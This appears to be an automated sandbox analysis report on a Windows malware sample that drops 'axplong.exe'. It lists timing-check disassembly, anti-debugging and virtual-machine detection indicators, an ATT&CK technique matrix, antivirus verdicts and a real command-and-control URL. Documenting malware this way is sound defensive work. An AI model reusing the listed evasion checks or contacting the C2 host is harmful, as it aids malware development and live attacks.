                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5140969 second address: 51409F4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4FE9502C63h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c pushad 0x0000000d pushfd 0x0000000e jmp 00007F4FE9502C5Fh 0x00000013 xor cl, FFFFFFEEh 0x00000016 jmp 00007F4FE9502C69h 0x0000001b popfd 0x0000001c push esi 0x0000001d push edi 0x0000001e pop esi 0x0000001f pop ebx 0x00000020 popad 0x00000021 xchg eax, ebp 0x00000022 push eax 0x00000023 push edx 0x00000024 pushad 0x00000025 push ebx 0x00000026 pop eax 0x00000027 pushfd 0x00000028 jmp 00007F4FE9502C67h 0x0000002d and ax, 9BAEh 0x00000032 jmp 00007F4FE9502C69h 0x00000037 popfd 0x00000038 popad 0x00000039 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 51409F4 second address: 5140A33 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4FE915D6B1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b jmp 00007F4FE915D6AEh 0x00000010 pop ebp 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007F4FE915D6B7h 0x00000018 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5130F46 second address: 5130F4C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5130F4C second address: 5130F69 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4FE915D6B2h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5130F69 second address: 5130F6D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5130F6D second address: 5130F71 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5130F71 second address: 5130F77 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 50D0EBE second address: 50D0ECC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4FE915D6AAh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 514020B second address: 5140211 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5140211 second address: 5140217 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5140217 second address: 514023C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ebp, esp 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F4FE9502C67h 0x00000013 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 514023C second address: 5140242 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5140242 second address: 514026C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movzx ecx, bx 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push dword ptr [ebp+0Ch] 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 jmp 00007F4FE9502C64h 0x00000016 mov cx, 24C1h 0x0000001a popad 0x0000001b rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 514026C second address: 5140272 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 51402E1 second address: 51402E7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 50F03D9 second address: 50F03EC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F4FE915D6AFh 0x00000009 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 50F03EC second address: 50F0402 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F4FE9502C5Bh 0x00000010 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 50F0402 second address: 50F042B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ecx, ebx 0x00000005 mov si, di 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebp 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f call 00007F4FE915D6B9h 0x00000014 pop ecx 0x00000015 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 50F042B second address: 50F0489 instructions: 0x00000000 rdtsc 0x00000002 mov dh, CAh 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushfd 0x00000007 jmp 00007F4FE9502C5Ah 0x0000000c add ah, 00000028h 0x0000000f jmp 00007F4FE9502C5Bh 0x00000014 popfd 0x00000015 popad 0x00000016 mov ebp, esp 0x00000018 jmp 00007F4FE9502C66h 0x0000001d push FFFFFFFEh 0x0000001f jmp 00007F4FE9502C60h 0x00000024 push 1EAD3E03h 0x00000029 push eax 0x0000002a push edx 0x0000002b jmp 00007F4FE9502C5Ch 0x00000030 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 50F0489 second address: 50F04FD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 pushfd 0x00000006 jmp 00007F4FE915D6B7h 0x0000000b sub cl, 0000002Eh 0x0000000e jmp 00007F4FE915D6B9h 0x00000013 popfd 0x00000014 popad 0x00000015 pop edx 0x00000016 pop eax 0x00000017 xor dword ptr [esp], 69ECFE1Bh 0x0000001e push eax 0x0000001f push edx 0x00000020 pushad 0x00000021 jmp 00007F4FE915D6B3h 0x00000026 call 00007F4FE915D6B8h 0x0000002b pop ecx 0x0000002c popad 0x0000002d rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 50F04FD second address: 50F0552 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov edx, eax 0x00000005 pushfd 0x00000006 jmp 00007F4FE9502C5Ah 0x0000000b add esi, 1471A538h 0x00000011 jmp 00007F4FE9502C5Bh 0x00000016 popfd 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a call 00007F4FE9502C59h 0x0000001f jmp 00007F4FE9502C66h 0x00000024 push eax 0x00000025 push eax 0x00000026 push edx 0x00000027 jmp 00007F4FE9502C5Eh 0x0000002c rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 50F0552 second address: 50F058E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4FE915D6ABh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [esp+04h] 0x0000000d jmp 00007F4FE915D6B9h 0x00000012 mov eax, dword ptr [eax] 0x00000014 push eax 0x00000015 push edx 0x00000016 jmp 00007F4FE915D6ACh 0x0000001b rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 50F06C6 second address: 50F0711 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov cx, di 0x00000006 movsx ebx, cx 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c xchg eax, edi 0x0000000d pushad 0x0000000e pushad 0x0000000f pushfd 0x00000010 jmp 00007F4FE9502C5Eh 0x00000015 xor esi, 43E808E8h 0x0000001b jmp 00007F4FE9502C5Bh 0x00000020 popfd 0x00000021 mov eax, 7F9E58DFh 0x00000026 popad 0x00000027 mov eax, 4539A3FBh 0x0000002c popad 0x0000002d push eax 0x0000002e push eax 0x0000002f push edx 0x00000030 jmp 00007F4FE9502C5Ch 0x00000035 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 50F0711 second address: 50F0717 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 50F0717 second address: 50F0744 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, edi 0x00000009 pushad 0x0000000a mov cx, bx 0x0000000d movsx edx, ax 0x00000010 popad 0x00000011 mov eax, dword ptr [7743B370h] 0x00000016 push eax 0x00000017 push edx 0x00000018 pushad 0x00000019 jmp 00007F4FE9502C5Fh 0x0000001e mov si, 7C9Fh 0x00000022 popad 0x00000023 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 50F0744 second address: 50F0777 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov eax, ebx 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xor dword ptr [ebp-08h], eax 0x0000000b jmp 00007F4FE915D6B8h 0x00000010 xor eax, ebp 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007F4FE915D6ACh 0x00000019 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 50F0777 second address: 50F0810 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4FE9502C5Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a pushad 0x0000000b call 00007F4FE9502C64h 0x00000010 mov dx, si 0x00000013 pop eax 0x00000014 pushfd 0x00000015 jmp 00007F4FE9502C67h 0x0000001a sub si, 730Eh 0x0000001f jmp 00007F4FE9502C69h 0x00000024 popfd 0x00000025 popad 0x00000026 push eax 0x00000027 jmp 00007F4FE9502C61h 0x0000002c nop 0x0000002d jmp 00007F4FE9502C5Eh 0x00000032 lea eax, dword ptr [ebp-10h] 0x00000035 pushad 0x00000036 mov dx, si 0x00000039 popad 0x0000003a mov dword ptr fs:[00000000h], eax 0x00000040 push eax 0x00000041 push edx 0x00000042 pushad 0x00000043 movsx edi, cx 0x00000046 mov edi, eax 0x00000048 popad 0x00000049 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 50F0810 second address: 50F0826 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F4FE915D6B2h 0x00000009 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 50F0826 second address: 50F082A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 50F082A second address: 50F0850 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov esi, dword ptr [ebp+08h] 0x0000000b pushad 0x0000000c mov dx, si 0x0000000f popad 0x00000010 mov eax, dword ptr [esi+10h] 0x00000013 push eax 0x00000014 push edx 0x00000015 jmp 00007F4FE915D6B1h 0x0000001a rdtsc
                  Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: DDEBE9 instructions caused by: Self-modifying code
                  Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: F856AD instructions caused by: Self-modifying code
                  Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: F8B954 instructions caused by: Self-modifying code
                  Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 1004D58 instructions caused by: Self-modifying code
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeSpecial instruction interceptor: First address: 28EBE9 instructions caused by: Self-modifying code
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeSpecial instruction interceptor: First address: 4356AD instructions caused by: Self-modifying code
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeSpecial instruction interceptor: First address: 43B954 instructions caused by: Self-modifying code
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeSpecial instruction interceptor: First address: 4B4D58 instructions caused by: Self-modifying code
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeRegistry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDescJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersionJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersionJump to behavior
                  Source: C:\Users\user\Desktop\file.exeCode function: 0_2_051401BA rdtsc 0_2_051401BA
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeThread delayed: delay time: 180000Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeWindow / User API: threadDelayed 1346Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeWindow / User API: threadDelayed 418Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeWindow / User API: threadDelayed 988Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeWindow / User API: threadDelayed 1332Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeWindow / User API: threadDelayed 1363Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 796Thread sleep count: 35 > 30Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 796Thread sleep time: -70035s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 3192Thread sleep count: 1346 > 30Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 3192Thread sleep time: -2693346s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 1336Thread sleep count: 418 > 30Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 1336Thread sleep time: -12540000s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 3556Thread sleep time: -180000s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 5660Thread sleep count: 988 > 30Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 5660Thread sleep time: -1976988s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 6596Thread sleep count: 1332 > 30Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 6596Thread sleep time: -2665332s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 4816Thread sleep count: 1363 > 30Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 4816Thread sleep time: -2727363s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\file.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeThread delayed: delay time: 30000Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeThread delayed: delay time: 180000Jump to behavior
                  Source: axplong.exe, axplong.exe, 00000005.00000002.3451017318.0000000000418000.00000040.00000001.01000000.00000007.sdmpBinary or memory string: HARDWARE\ACPI\DSDT\VBOX__
                  Source: axplong.exe, 00000005.00000002.3453927497.0000000000E2B000.00000004.00000020.00020000.00000000.sdmp, axplong.exe, 00000005.00000002.3453927497.0000000000DE9000.00000004.00000020.00020000.00000000.sdmp, axplong.exe, 00000005.00000002.3453927497.0000000000E16000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                  Source: file.exe, 00000000.00000002.2262607837.0000000000F68000.00000040.00000001.01000000.00000003.sdmp, axplong.exe, 00000002.00000002.2288291827.0000000000418000.00000040.00000001.01000000.00000007.sdmp, axplong.exe, 00000005.00000002.3451017318.0000000000418000.00000040.00000001.01000000.00000007.sdmpBinary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
                  Source: C:\Users\user\Desktop\file.exeSystem information queried: ModuleInformationJump to behavior
                  Source: C:\Users\user\Desktop\file.exeProcess information queried: ProcessInformationJump to behavior

                  Anti Debugging

                  barindex
                  Source: C:\Users\user\Desktop\file.exeThread information set: HideFromDebuggerJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeThread information set: HideFromDebuggerJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeThread information set: HideFromDebuggerJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeOpen window title or class name: regmonclass
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeOpen window title or class name: gbdyllo
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeOpen window title or class name: process monitor - sysinternals: www.sysinternals.com
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeOpen window title or class name: procmon_window_class
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeOpen window title or class name: registry monitor - sysinternals: www.sysinternals.com
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeOpen window title or class name: ollydbg
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeOpen window title or class name: filemonclass
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeOpen window title or class name: file monitor - sysinternals: www.sysinternals.com
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeFile opened: NTICE
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeFile opened: SICE
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeFile opened: SIWVID
                  Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
                  Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
                  Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeProcess queried: DebugPortJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeProcess queried: DebugPortJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeProcess queried: DebugPortJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeProcess queried: DebugPortJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeProcess queried: DebugPortJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeProcess queried: DebugPortJump to behavior
                  Source: C:\Users\user\Desktop\file.exeCode function: 0_2_051401BA rdtsc 0_2_051401BA
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeCode function: 5_2_0025645B mov eax, dword ptr fs:[00000030h]5_2_0025645B
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeCode function: 5_2_0025A1C2 mov eax, dword ptr fs:[00000030h]5_2_0025A1C2
                  Source: C:\Users\user\Desktop\file.exeProcess created: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe "C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe" Jump to behavior
                  Source: axplong.exe, axplong.exe, 00000005.00000002.3451017318.0000000000418000.00000040.00000001.01000000.00000007.sdmpBinary or memory string: Program Manager
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeCode function: 5_2_0023D312 cpuid 5_2_0023D312
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeQueries volume information: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeCode function: 5_2_0023CB1A GetSystemTimePreciseAsFileTime,GetSystemTimePreciseAsFileTime,5_2_0023CB1A
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeCode function: 5_2_002265B0 LookupAccountNameA,5_2_002265B0

                  Stealing of Sensitive Information

                  barindex
                  Source: Yara matchFile source: 5.2.axplong.exe.220000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 2.2.axplong.exe.220000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.file.exe.d70000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000002.00000002.2288200287.0000000000221000.00000040.00000001.01000000.00000007.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000002.00000003.2247936497.0000000004A10000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000002.2262535378.0000000000D71000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000005.00000002.3450902029.0000000000221000.00000040.00000001.01000000.00000007.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000005.00000003.2769975367.0000000004AD0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000003.2219847128.0000000004F30000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                  ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                  Gather Victim Identity InformationAcquire InfrastructureValid Accounts2
                  Command and Scripting Interpreter
                  1
                  Scheduled Task/Job
                  12
                  Process Injection
                  1
                  Masquerading
                  OS Credential Dumping1
                  System Time Discovery
                  Remote Services1
                  Archive Collected Data
                  1
                  Encrypted Channel
                  Exfiltration Over Other Network MediumAbuse Accessibility Features
                  CredentialsDomainsDefault Accounts1
                  Scheduled Task/Job
                  1
                  DLL Side-Loading
                  1
                  Scheduled Task/Job
                  251
                  Virtualization/Sandbox Evasion
                  LSASS Memory641
                  Security Software Discovery
                  Remote Desktop ProtocolData from Removable Media1
                  Ingress Tool Transfer
                  Exfiltration Over BluetoothNetwork Denial of Service
                  Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
                  DLL Side-Loading
                  12
                  Process Injection
                  Security Account Manager2
                  Process Discovery
                  SMB/Windows Admin SharesData from Network Shared Drive1
                  Non-Application Layer Protocol
                  Automated ExfiltrationData Encrypted for Impact
                  Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook2
                  Obfuscated Files or Information
                  NTDS251
                  Virtualization/Sandbox Evasion
                  Distributed Component Object ModelInput Capture11
                  Application Layer Protocol
                  Traffic DuplicationData Destruction
                  Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script12
                  Software Packing
                  LSA Secrets1
                  Application Window Discovery
                  SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                  Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                  DLL Side-Loading
                  Cached Domain Credentials1
                  Account Discovery
                  VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                  DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup ItemsCompile After DeliveryDCSync1
                  System Owner/User Discovery
                  Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                  Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/JobIndicator Removal from ToolsProc Filesystem1
                  File and Directory Discovery
                  Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                  Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAtHTML Smuggling/etc/passwd and /etc/shadow224
                  System Information Discovery
                  Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                  Hide Legend

                  Legend:

                  • Process
                  • Signature
                  • Created File
                  • DNS/IP Info
                  • Is Dropped
                  • Is Windows Process
                  • Number of created Registry Values
                  • Number of created Files
                  • Visual Basic
                  • Delphi
                  • Java
                  • .Net C# or VB.NET
                  • C, C++ or other language
                  • Is malicious
                  • Internet

                  This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                  windows-stand
                  SourceDetectionScannerLabelLink
                  file.exe100%AviraTR/Crypt.TPM.Gen
                  file.exe100%Joe Sandbox ML
                  SourceDetectionScannerLabelLink
                  C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe100%AviraTR/Crypt.TPM.Gen
                  C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe100%Joe Sandbox ML
                  No Antivirus matches
                  No Antivirus matches
                  SourceDetectionScannerLabelLink
                  http://185.215.113.16/Jo89Ku7d/index.phpQi100%Avira URL Cloudphishing
                  http://185.215.113.16/Jo89Ku7d/index.phpoh100%Avira URL Cloudphishing
                  http://185.215.113.16/Jo89Ku7d/index.phph100%Avira URL Cloudphishing
                  http://185.215.113.16/Jo89Ku7d/index.phpL100%Avira URL Cloudphishing
                  http://185.215.113.16/Jo89Ku7d/index.phpd100%Avira URL Cloudphishing
                  http://185.215.113.16/Jo89Ku7d/index.phpsK100%Avira URL Cloudphishing
                  http://185.215.113.16/Jo89Ku7d/index.phpPh100%Avira URL Cloudphishing
                  http://185.215.113.16/Jo89Ku7d/index.php100%Avira URL Cloudmalware
                  http://185.215.113.16/Jo89Ku7d/index.php3i100%Avira URL Cloudphishing
                  http://185.215.113.16/Jo89Ku7d/index.php8100%Avira URL Cloudphishing
                  http://185.215.113.16/Jo89Ku7d/index.php2h100%Avira URL Cloudphishing
                  http://185.215.113.16/Jo89Ku7d/index.php4100%Avira URL Cloudphishing
                  http://185.215.113.16/Jo89Ku7d/index.phpBi100%Avira URL Cloudphishing
                  http://185.215.113.16/Jo89Ku7d/index.phpded100%Avira URL Cloudphishing
                  http://185.215.113.16/Jo89Ku7d/index.phpiP100%Avira URL Cloudphishing
                  http://185.215.113.16/Jo89Ku7d/index.php#h100%Avira URL Cloudmalware
                  http://185.215.113.16/Jo89Ku7d/index.phpncoded100%Avira URL Cloudphishing
                  No contacted domains info
                  NameMaliciousAntivirus DetectionReputation
                  http://185.215.113.16/Jo89Ku7d/index.phptrue
                  • Avira URL Cloud: malware
                  unknown
                  NameSourceMaliciousAntivirus DetectionReputation
                  http://185.215.113.16/Jo89Ku7d/index.phpLaxplong.exe, 00000005.00000002.3453927497.0000000000E16000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: phishing
                  unknown
                  http://185.215.113.16/Jo89Ku7d/index.phphaxplong.exe, 00000005.00000002.3453927497.0000000000E16000.00000004.00000020.00020000.00000000.sdmp, axplong.exe, 00000005.00000002.3453927497.0000000000DAB000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: phishing
                  unknown
                  http://185.215.113.16/Jo89Ku7d/index.phpohaxplong.exe, 00000005.00000002.3453927497.0000000000E2B000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: phishing
                  unknown
                  http://185.215.113.16/Jo89Ku7d/index.phpPhaxplong.exe, 00000005.00000002.3453927497.0000000000E2B000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: phishing
                  unknown
